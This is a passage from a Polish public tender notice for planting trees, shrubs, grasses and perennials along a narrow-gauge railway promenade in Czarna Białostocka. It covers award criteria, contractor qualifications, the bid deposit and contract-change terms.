class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający dokona oceny ofert przyznając w ramach poszczególnych kryteriów oceny ofert.<br/>Zamawiający informuje, iż ocena ofert będzie dokonana przez Zamawiającego oddzielnie dla każdej części.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Szczegółowy opis przedmiotu zamówienia, warunki i sposób jego realizacji stanowi Załącznik nr 2 do SWZ:<br/>Renowacja i rewitalizacja torowiska kolejki wąskotorowej oraz stworzenie wzdłuż torowiska promenady będącej zieloną<br/>przestrzenią publiczną i zagospodarowaniem terenów przyległych z elementami małej architektury, zielenią zorganizowaną<br/>wraz z oświetleniem terenu i monitoringiem wizyjnym w Czarnej Białostockiej w ramach zadania „Zielona kolejka cz. I”<br/>w postaci:<br/>Część 2 – Zieleń zorganizowana<br/>- Wykonać dostawę i nasadzenia zieleni zorganizowanej w postaci:<br/>a. drzew iglastych<br/>• 6 szt. sosny czarnej &#39;Green Tower&#39; wysokości 150-200 i szerokości min. 50 cm,<br/>• 1 szt. świerku białego Sander&#39;s Blue wysokości 150-200 i szerokości min. 50 cm,<br/>• 3 szt. świerków białych Sun on the Sky wysokości min. 100 cm i szerokości min. 50 cm,<br/>• 3 szt. świerk kaukaski &#39;Aurea&#39; wysokości min.100 cm i szerokości min. 50 cm,<br/>• 20 szt. sosen kosodrzewina Pumilio wysokości min.30 cm i szerokości min. 30 cm,<br/>• 13 szt. cyprysików groszkowych wysokości min.20 cm i szerokości min. 30 cm,<br/>• 4 szt. cisów pospolitych Elegantissima wysokości min.40 cm i szerokości min. 30 cm,<br/>• 4 szt. cisów pośrednich Hillii wysokości min.80 cm i szerokości min. 40 cm,<br/>• 6 szt. jałowców łuskowatych Hunnetorp wysokości min.30 cm i szerokości min. 40 cm,<br/>• 11 szt. jałowców płożących Limeglow wysokości min.30 cm i szerokości min. 40 cm,<br/>• 2 szt. jałowców Pfitzera King of Spring wysokości min.30 cm i szerokości min. 40 cm,<br/>b. drzew i krzewów liściastych:<br/>• 9 szt. forsycji pośredniej Goldrausch wysokości min.100 cm i szerokości min. 50 cm,<br/>• 12 szt. klonów pospolitych Priceton Gold wysokości min. 200 cm,<br/>• 11 szt. klonów palmowych Orange Dream wysokości min. 200 cm,<br/>• 11 szt. klonów kolumnowy Crimson Sentry wysokości min. 200 cm,<br/>• 15 szt. kaliny japońskiej Kilimandjaro wysokości min.100 cm i szerokości min. 50 cm,<br/>• 9 szt. dereni białych Argenteomarginata wysokości min.120 cm i szerokości min. 50 cm,<br/>• 5 szt. enkiantów dzwonkowatych wysokości min.150 cm,<br/>• 5 szt. głogów pośrednich &#39;Paul&#39;s Scarlet&#39; wysokości min.150 cm,<br/>• 9 szt. perukowców podolskich Royal Purple wysokości min.150 cm,<br/>c. traw:<br/>• 34 szt. wydmuchrzycy piaskowej wysokości min.60 cm i szerokości min. 60 cm,<br/>• 38 szt. miskantów chińskich Adagio wysokości min.60 cm i szerokości min. 60 cm,<br/>• 14 szt. miskantów chińskich &#39;Malepartus&#39; wysokości min.50 cm i szerokości min. 50 cm,<br/>• 32 szt. miskantów chińskich Morning Light wysokości min.50 cm i szerokości min. 50 cm,<br/>• 24 szt. rozplenic japońskich piórkówka “Moudry” wysokości min.50 cm i szerokości min. 50 cm,<br/>• 16 szt. juk Karolińskich wysokości min.70 cm,<br/>d. bylin:<br/>• 108 szt. szałwi omszonej Blauhugel wysokości min.30 cm,<br/>• 105 szt. żurawki Sweet Tea wysokości min.30 cm,<br/>• 45 szt. funkii Minuteman wysokości min.20 cm,<br/>• 90 szt. przetaczników kłosowych First Choice wysokości min.20 cm,<br/>• 92 szt. liriop szafirkowatych Big Blue wysokości min.20 cm,<br/>• 60 szt. mikołajów alpejskich wysokości min.20 cm,<br/>• 69 szt. puszkini cebulicowatej wysokości min.20 cm,<br/>• 136 szt. szafirków armeńskich wysokości min.10 cm,<br/>e. rozchodników:<br/>• po 338 szt. następujących:<br/>- rozchodnik kaukaski &#34;Purpureum Winter Sedum spurium&#34;,<br/>- rozchodnik sześciorzędowy &#34;Sedum sexangulare&#34;,<br/>- rozchodnik oregoński &#34;Sedum oreganum&#34;,<br/>- rozchodnik ostry „YELLOW QUEEN&#34;,<br/>- rozchodnik naskalny LIDAKENSE,<br/>- rozchodnik kwiecisty Weihenstephaner Gold,<br/>-rozchodnik kaukaski &#34;Variegatum Sedum spurium&#34;,<br/>• po 81 szt. następujących:<br/>- rojnik pajęczynowaty &#34;Sempervivum arachnoideum&#34;,<br/>- rozchodnik nicejski &#34;Aureum Sedum sediforme&#34;,<br/>- rozchodnik ostry &#34;Sedum acre&#34;,<br/>- rozchodnik ościsty &#34;Sedum reflexum&#34;,<br/>- rozchodnik ościsty &#39;Cristatum&#39;.<br/>- wypełnić wydzielone strefy korowania korą sosnową, którą należy wykonać o grubości min. 5 cm na powierzchni ok. 1210<br/>m2 oraz wypełnić strefę obrzutu dekoracyjnego z kamienia (otoczak) płukanego, śnieżnobiałego którą należy wykonać o<br/>grubości min. 8 cm na powierzchni ok. 200 m2.<br/>Do zadań Wykonawcy części 2 należy również:<br/>- wykonanie robót związanych z zielenią zorganizowaną zgodnie z Dokumentacją Techniczną i uzgodnieniami z<br/>Inwestorem,<br/>- dostawa materiałów objętych projektem oraz innych niezbędnych do prawidłowego wykonania zamówienia,<br/>- demontaż wraz z utylizacją wszystkich materiałów z rozbiórki i powstałych w trakcie prowadzenia prac,<br/>- Wykonawca jest zobowiązany do wykonania własnym staraniem i na własny koszt:<br/>• sporządzenia planu Bezpieczeństwa i Ochrony Zdrowia (BIOZ) zgodnie z obowiązującymi przepisami w tym zakresie i<br/>przestrzegania jego postanowień,<br/>• opracowania i uzgodnienia czasowej organizacji ruchu o ile zajdzie konieczność,<br/>• wywiezienia z terenu budowy i przekazania do zagospodarowania lub utylizacji wszystkich odpadów pochodzących z robót zgodnie z obowiązującymi przepisami oraz przekazania Zamawiającemu odpowiedniej dokumentacji w tym zakresie, w tym<br/>kart przekazania odpadów,<br/>• zabezpieczenia terenu na czas prowadzenia robót, uporządkowania terenu budowy po zakończeniu robót oraz wykonania<br/>prac związanych z przywróceniem terenu do stanu pierwotnego,<br/>• zapewnienia mediów niezbędnych do prowadzenia robót,<br/>• zapewnienia materiałów niezbędnych do realizacji przedmiotu zamówienia.<br/>• zapewnienia pielęgnacji w tym cięć i kształtowania oraz nawożenia wykonanych przestrzeni zieleni zorganizowanej w<br/>okresie 2 lat od terminu odbioru końcowego. Należy przewidzieć wykonanie stosownych zabiegów wiosną i jesienią danego<br/>roku,<br/>• zapewnia własnym staraniem i na swój koszt wszystkich narzędzi, sprzętu budowlanego oraz środków transportu<br/>niezbędnych do realizacji zadania,.<br/>1.Szczegółowy zakres robót zawierają projekty techniczny stanowiące Załączniki nr 1.2 do 1.3 do SWZ. W przypadku<br/>stwierdzenia rozbieżności - rozstrzygające są zapisy w dokumentacji wykonawczej przed przedmiarem robót, a w ramach<br/>dokumentacji wykonawczej – rysunki, schematy montażowe i plan sytuacyjny przed zestawieniami materiałów.<br/>2. Poprzez równoważność Zamawiający rozumie zastosowanie takich materiałów, których parametry techniczne, jakościowe<br/>i technologiczne będą takie same lub lepsze od materiałów jakie zostały przyjęte w rozwiązaniach Dokumentacji<br/>Technicznej.<br/>3 Niezależnie od zgodności z parametrami technicznymi wyszczególnionymi w Dokumentacji Technicznej, zastosowanie<br/>materiałów i rozwiązań równoważnych musi zagwarantować realizację zamówienia w zgodzie z Przedmiotem Zamówienia<br/>opisanym w niniejszej SWZ.<br/>4 W przypadku oferowania rozwiązań równoważnych w stosunku do określonych w Dokumentacji Technicznej, Wykonawca<br/>zobowiązany jest wykazać na etapie składania ofert, że oferowane przez niego dostawy i usługi spełniają wymagania<br/>określone przez mawiającego, załączając odpowiednie dokumenty do oferty potwierdzające spełnienie wymagań<br/>określonych przez Zamawiającego.<br/>5. Zamawiający wymaga udzielenia gwarancji na realizację zamówienia, na okres 60 miesięcy od dnia końcowego odbioru<br/>robót.<br/>Ponad to:<br/>- Zamawiający przewiduje etapowe (nie częściej niż raz na kwartał) rozliczenie robót uzależniając płatność za konkretny<br/>etap realizacji robót zgodny z przedstawionym i zaakceptowanym harmonogramem rzeczowo-finansowym, ich faktycznym<br/>wykonaniem potwierdzonym przez Inspektora nadzoru inwestorskiego, pisemnym zgłoszeniem zakończenia etapu robót<br/>złożonym Zamawiającemu oraz po protokolarnym potwierdzeniu tego faktu,<br/>- W przypadku wykonywania robót części 1 i części 2 przez różnych wykonawców. Harmonogram rzeczowo-finansowy<br/>przedkładany przez Wykonawcę części 1 powinien być uzgodniony z Wykonawca części 2 a harmonogramem przedkładany<br/>przez Wykonawcę części 2 powinien być uzgodniony z Wykonawca części 1.<br/>- Zamawiający informuje, że koszty związane z poborem energii elektrycznej, energii cieplnej, wody oraz zabezpieczeniem<br/>sanitarnym ponosi Wykonawca w oparciu o odrębne umowy z gestorami sieci bądź ze specjalistycznymi firmami<br/>realizującymi takie usługi,<br/>- złożenie przed podpisaniem umowy kosztorysu ofertowego a po wykonaniu zadania kosztorysu powykonawczego,<br/>Inwestycję należy wycenić i wykonać zgodnie z dokumentacją projektową stanowiącą załączniki nr 1.2 i 1,3 oraz 3.1 do<br/>SWZ i przedmiarem robót (załącznik nr 2.4 do SWZ) który jest jedynie elementem pomocniczym do przygotowania oferty.<br/>Zamawiający zgodnie z art. 101 ust. 4 prawa zamówień publicznych informuje, że ilekroć w dokumentacji zamówienia<br/>wskazane zostały normy, oceny techniczne, specyfikacje techniczne i systemy referencji technicznych dopuszcza się<br/>również rozwiązania równoważne z opisywanymi w powyższych dokumentach. Tym samym do wymaganych cech<br/>materiału, produktu lub usługi, dopuszczalne są rozwiązania wskazane w tych dokumentach „ lub równoważne”. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">77310000-6 - Usługi sadzenia roślin oraz utrzymania terenów zielonych</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-12-15</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający dokona oceny ofert przyznając w ramach poszczególnych kryteriów oceny ofert.<br/>Zamawiający informuje, iż ocena ofert będzie dokonana przez Zamawiającego oddzielnie dla każdej części.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy nie podlegają wykluczeniu na zasadach określonych w<br/>Rozdziale IX SWZ, oraz spełniają określone przez Zamawiającego warunki udziału w postępowaniu.<br/>2. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają niżej określone przez Zamawiającego warunki<br/>udziału w postępowaniu:<br/>1) W zakresie kompetencji lub uprawnień do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych<br/>przepisów:<br/>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnienie Wykonawca zobowiązany jest wykazać w<br/>sposób szczególny. Zamawiający uzna, że warunek jest spełniony, jeżeli Wykonawca złoży oświadczenie o spełnieniu<br/>warunków udziału w postępowaniu.<br/>2) W zakresie sytuacji ekonomicznej lub finansowej:<br/>Zamawiający wymaga, aby Wykonawca posiadał opłaconą polisę, a w przypadku jej braku innego dokumentu<br/>potwierdzającego, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności<br/>związanej z przedmiotem zamówienia na sumę gwarancyjną:<br/>- dla Część 1 - minimum 500.000,00 zł<br/>- dla Część 2 – minimum 200.000,00 zł<br/>3) W zakresie zdolności technicznej lub zawodowej<br/>o dla Części 1<br/>a) w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w<br/>tym okresie, należycie wykonali co najmniej dwa zamówienia polegające na realizacji budowy, rozbudowy lub modernizacji<br/>np. placów, skwerów, bulwarów, promenad rekreacyjnych z małą architekturą, ciągów komunikacji pieszej lub rowerowej z<br/>małą architekturą,<br/>b) dysponują kierownikiem budowy posiadającym uprawnienia budowlane do kierowania robotami budowlanymi w<br/>specjalności drogowej oraz posiadającym aktualną przynależność do właściwej Izby Inżynierów i Techników Budownictwa<br/>zgodnie z obowiązującymi przepisami. Jeżeli potwierdzenie przynależności traci ważność w okresie obowiązywania umowy,<br/>Wykonawca zobowiązuje się przedstawić nowe potwierdzenie, ważne na czas trwania umowy lub wskaże inną osobę<br/>posiadającą przynajmniej takie same uprawnienia (aktualną przynależność do właściwej Izby Inżynierów Budownictwa).<br/>Ilekroć Zamawiający wymaga określonych uprawnień budowlanych, rozumie przez to uprawnienia wydane na podstawie<br/>aktualnie obowiązującej ustawy z dnia 7 lipca 1994 r. – Prawo budowlane (Dz. U. z 2023 r. poz. 682 t.j.) jak również<br/>odpowiadające im ważne uprawnienia budowlane, wydane na podstawie uprzednio obowiązujących przepisów oraz<br/>równoważne kwalifikacje, zdobyte w innych państwach, na zasadach określonych w art. 12a ustawy z dnia 7 lipca 1994r.<br/>Prawo budowlane, z uwzględnieniem postanowień ustawy z dnia 18 marca 2008 r. o zasadach uznawania kwalifikacji<br/>zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. z 2020 r., 220 t. j.). oraz dodatkowo spełniać<br/>wymagania określone w decyzji nr Z-I.5142.42.2024.PT z dnia 12.06.2024r. stanowiącej załącznik nr 1.6 do SWZ tj.<br/>„Kierowania robotami budowlanymi przez osoby spełniające wymagania o których mowa w art. 37c ustawy”,<br/>c) zapewnią uprawnionego geodetę do geodezyjnej obsługi inwestycji (tyczenie obiektów, prowadzenie budowy obiektów<br/>oraz wykonania geodezyjnej inwentaryzacji powykonawczej obiektów) posiadającego uprawnienia klasy 4 do obsługi<br/>inwestycji budowlanej.<br/>o dla Części 2<br/>a) w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w<br/>tym okresie, należycie wykonali co najmniej dwa zamówienia polegające na realizacji usługi związanej z wykonaniem<br/>nasadzeń zieleni zorganizowanej (drzew, krzewów, bylin, traw itp.) w obszarach skwerów, bulwarów, promenad<br/>rekreacyjnych na powierzchni min. 500 m2,<br/>b) dysponują kierownikiem robót posiadającym wykształcenie min. średnie w specjalności ogrodnictwo w tym wiedzę<br/>merytoryczną i praktyczną związaną z zakładaniem i pielęgnacją terenów zieleni zorganizowanej.<br/>UWAGA<br/>W przypadku wykonawców wspólnie ubiegających się o zamówienie, warunek dotyczący uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej jest spełniony, jeżeli co najmniej jeden z wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienia posiada uprawnienia do prowadzenia określonej działalności gospodarczej lub zawodowej i zrealizuje roboty budowlane, dostawy lub usługi, do których realizacji te uprawnienia są wymagane. (art. 117 pzp)<br/>3. Zamawiający, w stosunku do Wykonawców wspólnie ubiegających się o udzielenie zamówienia, w odniesieniu do<br/>warunku dotyczącego zdolności technicznej lub zawodowej - dopuszcza łączne spełnianie warunku przez Wykonawców.<br/>4. Zamawiający może na każdym etapie postępowania, uznać, że wykonawca nie posiada wymaganych zdolności, jeżeli posiadanie przez wykonawcę sprzecznych interesów, w szczególności zaangażowanie zasobów technicznych lub zawodowych wykonawcy w inne przedsięwzięcia gospodarcze wykonawcy może mieć negatywny wpływ na realizację zamówienia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1. Do oferty Wykonawca<br/>zobowiązany jest dołączyć aktualne na dzień składania ofert oświadczenie o spełnieniu warunków udziału w postępowaniu oraz o<br/>braku podstaw wykluczenia z postępowania, którego wzór stanowi Załącznik nr 4 i 5 do SWZ. Oświadczenia te składa się pod<br/>rygorem nieważności w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym.<br/>2. Informacje zawarte w oświadczeniach, o których mowa w pkt. 1 stanowią wstępne potwierdzenie, że Wykonawca nie podlega<br/>wykluczeniu oraz spełnia warunki udziału<br/>w postępowaniu.<br/>3. Zamawiający wezwie Wykonawcę, którego oferta zostanie najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym<br/>niż 5 dni od dnia wezwania, aktualnych na dzień złożenia podmiotowych środków dowodowych.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Oświadczenia Wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy,<br/>o braku przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16.02.2007 r. o ochronie konkurencji i<br/>konsumentów (Dz.U. z 2021 r. poz. 275),z innym wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek o<br/>dopuszczenie do udziału w postepowaniu, albo oświadczenie o przynależności do tej samej grupy kapitałowej wraz z dokumentami<br/>lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału<br/>w postepowaniu niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej. Wzór oświadczenia stanowi Zał nr 6<br/>do SWZ.<br/>2) W celu potwierdzania spełniania przez Wykonawcę warunków udziału w postępowaniu Wykonawca składa:<br/>o dla Części 1<br/>a) wykazu robót budowlanych stanowiący zał do SWZ wykonanych nie wcześniej niż w okresie ostatnich 5 lat przed upływem<br/>terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich przedmiotu, daty<br/>wykonania i podmiotów, na rzecz, których roboty budowlane zostały wykonane, oraz załączeniem dowodów określających czy te<br/>roboty budowlane zostały wykonane należycie, przy czym dowodami, o których mowa, są: -referencje, bądź inne dokumenty<br/>wystawione przez podmiot, na rzecz którego roboty budowlane były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym<br/>charakterze Wykonawca nie jest w stanie uzyskać tych dokumentów - oświadczenie Wykonawcy. Zamawiający zastrzega<br/>weryfikację potwierdzenia należytego wykonania prac bezpośrednio u podmiotu, na rzecz którego były wykonane stanowiący Zał nr<br/>8 do SWZ;<br/>b) wykazu osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za<br/>wykonanie roboty budowlanej, kontrolę jakości lub kierowanie pracami, wraz z informacjami na temat ich kwalifikacji zawodowych,<br/>uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych<br/>przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami zgodnie z wzorem stanowiącym Zał nr 7 do SWZ;<br/>c) opłaconej polisy, a w przypadku jej braku, inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności<br/>cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę co najmniej 500.000,00 zł<br/>o dla Części 2<br/>a) wykazu usług stanowiący zał do SWZ wykonanych nie wcześniej niż w okresie ostatnich 5 lat przed upływem terminu składania<br/>ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich przedmiotu, daty wykonania i<br/>podmiotów, na rzecz, których usługi zostały wykonane, oraz załączeniem dowodów określających czy te usługi zostały wykonane<br/>należycie, przy czym dowodami, o których mowa, są: -referencje, bądź inne dokumenty wystawione przez podmiot, na rzecz którego<br/>usługi były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać tych<br/>dokumentów - oświadczenie Wykonawcy. Zamawiający zastrzega weryfikację potwierdzenia należytego wykonania prac<br/>bezpośrednio u podmiotu, na rzecz którego były wykonane stanowiący Zał nr 9 do SWZ;<br/>b) wykazu osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za<br/>(świadczenie lub wykonanie) usług, kontrolę jakości lub kierowanie pracami, wraz z informacjami na temat ich kwalifikacji<br/>zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu<br/>wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami zgodnie z wzorem stanowiącym<br/>Zał nr 7 do SWZ;<br/>c) opłaconej polisy, a w przypadku jej braku, inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności<br/>cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę co najmniej 200.000,00 zł</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1. Na podstawie art. 97 ust. 1 ustawy Zamawiający żąda od Wykonawców wniesienia wadium.<br/>2. Zamawiający wymaga, aby wadium wniesione zostało przed upływem terminu składania ofert w kwocie:<br/>Część 1: 4.000,00 PLN (słownie: cztery tysiące złotych 00/100 PLN)<br/>Część 2: 2.000,00 PLN (słownie: dwa tysiące złotych 00/100 PLN)<br/>i utrzymane zostało nieprzerwanie do dnia upływu terminu związania ofertą, z wyjątkiem przypadków, o których mowa w art.<br/>98 ust. 1 pkt 2 i 3 oraz ust. 2 ustawy.<br/>3. Wadium wniesione w pieniądzu będzie wniesione skutecznie, jeżeli rachunek bankowy Zamawiającego zostanie uznany<br/>kwotą wadium przed upływem terminu składania ofert (tj. przed upływem dnia i godziny wyznaczonej jako ostateczny termin<br/>składania ofert)<br/>4. Wadium wnoszone w pieniądzu należy wpłacić przelewem na następujący rachunek bankowy Zamawiającego: Nr 35<br/>1020 1332 0000 1102 0280 9606.<br/>5. Wadium może być wniesione w jednej lub kilku następujących formach:<br/>1) pieniądzu;<br/>2) gwarancjach bankowych;<br/>3) gwarancjach ubezpieczeniowych;<br/>4) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o<br/>utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2023 r. poz. 462, z poźn. zm.).<br/>Wadium wniesione w pieniądzu Zamawiający przechowuje na rachunku bankowym.<br/>6. Jeżeli wadium jest wnoszone w formie gwarancji lub poręczenia, o których mowa w pkt 5 ppkt 2) 3) 4), Wykonawca<br/>przekazuje Zamawiającemu oryginał gwarancji lub poręczenia, w postaci elektronicznej, podpisany kwalifikowanym<br/>podpisem elektronicznym przez wystawcę dokumentu.<br/>7. W przypadku wniesienia wadium w innej formie niż w pieniądzu, z treści gwarancji i poręczeń musi wynikać<br/>bezwarunkowe, nieodwołalne i na pierwsze żądanie Zamawiającego (beneficjenta) zobowiązanie Gwaranta do zapłaty na<br/>rzecz Zamawiającego kwoty wadium w okolicznościach skutkujących zatrzymaniem wadium określonych w art. 98 ust. 6<br/>ustawy.<br/>8. Oferta Wykonawcy, który nie wniesie wadium lub wniesie w sposób nieprawidłowy lub nie utrzyma wadium nieprzerwanie<br/>do upływu terminu związania ofertą lub złoży wniosek o zwrot wadium w przypadku, o którym mowa w art. 98 ust. 2 pkt 3<br/>ustawy, zostanie odrzucona <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają<br/>pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i<br/>zawarcia umowy w sprawie zamówienia publicznego.<br/>2. W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenia o których mowa w<br/>rozdziale X pkt. 1 SWZ składa każdy z wykonawców. Oświadczenia te potwierdzają, brak podstaw wykluczenia oraz<br/>spełnianie warunków udziału w zakresie, w jakim każdy z wykonawców wykazuje spełnienie warunków udziału w<br/>postępowaniu.<br/>3. Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania składa każdy z Wykonawców<br/>wspólnie ubiegających się o zamówienie.<br/>4. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenia, z których wynika, które<br/>usługi wykonują poszczególni wykonawcy. Wzór oświadczenia stanowi Załącznik nr 11 do SWZ. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Wybrany wykonawca jest zobowiązany do zawarcia umowy w sprawie zamówienia publicznego na warunkach<br/>określonych w projektowanych postanowieniach umowy, które zostaną wprowadzone do umowy w sprawie zamówienia<br/>publicznego stanowiących Załącznik nr 3 do SWZ.<br/>2. Zakres świadczenia Wykonawcy wynikający z umowy jest tożsamy z jego zobowiązaniem zawartym w ofercie.<br/>3. Zamawiający przewiduje możliwości zmiany zawartej umowy w stosunku do treści wybranej oferty w zakresie<br/>uregulowanym w art. 454 – 455 pzp oraz wskazanym w projektowanych postanowieniach umowy, które zostaną<br/>wprowadzone do umowy w sprawie zamówienia publicznego stanowiących Załącznik nr 2 do SWZ.<br/>4. Zmiana umowy wymaga dla swojej ważności, pod rygorem nieważności, zachowania formy pisemnej.<br/>5. Zakazuje się istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano<br/>wyboru Wykonawcy, chyba że zmiana będzie dotyczyła następujących zdarzeń:<br/>1) Wystąpienia zmian powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu<br/>umowy.<br/>2) Wyniknięcia rozbieżności lub niejasności w rozumieniu pojęć użytych w umowie, których nie można usunąć w inny<br/>sposób, a zmiana będzie 